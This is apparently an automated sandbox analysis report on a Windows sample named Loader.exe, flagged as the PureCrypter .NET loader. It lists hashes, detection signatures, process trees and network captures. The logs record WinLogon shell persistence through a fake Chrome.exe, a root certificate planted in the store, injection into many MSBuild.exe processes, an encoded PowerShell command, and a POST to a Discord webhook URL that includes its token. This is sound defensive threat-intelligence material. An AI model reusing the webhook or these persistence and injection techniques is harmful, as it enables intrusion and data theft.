Analysis
-
max time kernel
47s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03/02/2023, 18:58 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20220812-en
8 signatures
150 seconds
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win10v2004-20220812-en
7 signatures
150 seconds
General
-
Target
Loader.exe
-
Size
1.6MB
-
MD5
a44e526804469076d712e8a05ddd7759
-
SHA1
7010fda540e70139020a7a79730e74e99bd8e6c9
-
SHA256
46d7128963bde013c8ec359b285e47eabbf9c88e332735e02ced518773e8e95f
-
SHA512
04c40ef00c80d641c4f7bced8aefc180d695ea23ef79e272167f1a567484be2ab7031ca55a246cbeba1ed0c0ed93223fc2a33daed7f2048c62f169f0e6325b36
-
SSDEEP
49152:fBvdZG5o8InNXL9Qn0HpZjI64n2hcyfT2:pFZG5oNnRfh9
Score
10/10
Malware Config
Signatures
-
Detect PureCrypter injector 1 IoCs
resource yara_rule behavioral1/memory/364-55-0x000000001BF40000-0x000000001C218000-memory.dmp family_purecrypter -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Google\\Chrome.exe\"," Loader.exe -
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 Loader.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 Loader.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1104 powershell.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe 364 Loader.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1104 powershell.exe Token: SeDebugPrivilege 364 Loader.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 364 wrote to memory of 1104 364 Loader.exe 28 PID 364 wrote to memory of 1104 364 Loader.exe 28 PID 364 wrote to memory of 1104 364 Loader.exe 28 PID 364 wrote to memory of 1776 364 Loader.exe 29 PID 364 wrote to memory of 1776 364 Loader.exe 29 PID 364 wrote to memory of 1776 364 Loader.exe 29 PID 364 wrote to memory of 588 364 Loader.exe 30 PID 364 wrote to memory of 588 364 Loader.exe 30 PID 364 wrote to memory of 588 364 Loader.exe 30 PID 364 wrote to memory of 1652 364 Loader.exe 31 PID 364 wrote to memory of 1652 364 Loader.exe 31 PID 364 wrote to memory of 1652 364 Loader.exe 31 PID 364 wrote to memory of 1064 364 Loader.exe 32 PID 364 wrote to memory of 1064 364 Loader.exe 32 PID 364 wrote to memory of 1064 364 Loader.exe 32 PID 364 wrote to memory of 580 364 Loader.exe 33 PID 364 wrote to memory of 580 364 Loader.exe 33 PID 364 wrote to memory of 580 364 Loader.exe 33 PID 364 wrote to memory of 1724 364 Loader.exe 34 PID 364 wrote to memory of 1724 364 Loader.exe 34 PID 364 wrote to memory of 1724 364 Loader.exe 34 PID 364 wrote to memory of 1772 364 Loader.exe 35 PID 364 wrote to memory of 1772 364 Loader.exe 35 PID 364 wrote to memory of 1772 364 Loader.exe 35 PID 364 wrote to memory of 932 364 Loader.exe 36 PID 364 wrote to memory of 932 364 Loader.exe 36 PID 364 wrote to memory of 932 364 Loader.exe 36 PID 364 wrote to memory of 1492 364 Loader.exe 37 PID 364 wrote to memory of 1492 364 Loader.exe 37 PID 364 wrote to memory of 1492 364 Loader.exe 37 PID 364 wrote to memory of 888 364 Loader.exe 38 PID 364 wrote to memory of 888 364 Loader.exe 38 PID 364 wrote to memory of 888 364 Loader.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Modifies WinLogon for persistence
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:1776
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:588
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:1652
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:1064
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:580
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:1724
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:1772
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:932
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:1492
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵PID:888
-
Network
-
Remote address:8.8.8.8:53Requestptb.discord.comIN AResponseptb.discord.comIN A162.159.128.233ptb.discord.comIN A162.159.135.232ptb.discord.comIN A162.159.138.232ptb.discord.comIN A162.159.137.232ptb.discord.comIN A162.159.136.232
-
POSThttps://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luyLoader.exeRemote address:162.159.128.233:443RequestPOST /api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ptb.discord.com
Content-Length: 202
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 204 No Content
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=216b8ec0a3f511ed8e2022b34b66156a; Expires=Wed, 02-Feb-2028 19:01:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1675450875
x-ratelimit-reset-after: 1
Via: 1.1 google
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5HDV0Gj5YpoR6%2FJGLQYLMgX65zbEIC1Phax524jgnDqiNo5ZMV%2FjRnmzYvJVq9SvimkXr%2BaGYhrms1q5pgKO8rE7NRHIKGxgjdxpQv%2BmEwsbkZihIJlXnezrw2%2FLTjxMLg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __sdcfduid=216b8ec0a3f511ed8e2022b34b66156a533a721b4e4ddd865171029e1827a5077967b578e710f0c99783e184c5e8c53b; Expires=Wed, 02-Feb-2028 19:01:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=06bf2a3f5434bc90b1b64641c8329bcbf8c6f723-1675450874; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 793d69f9fb350ead-AMS
-
162.159.128.233:443https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luytls, httpLoader.exe1.2kB 4.4kB 9 9
HTTP Request
POST https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luyHTTP Response
204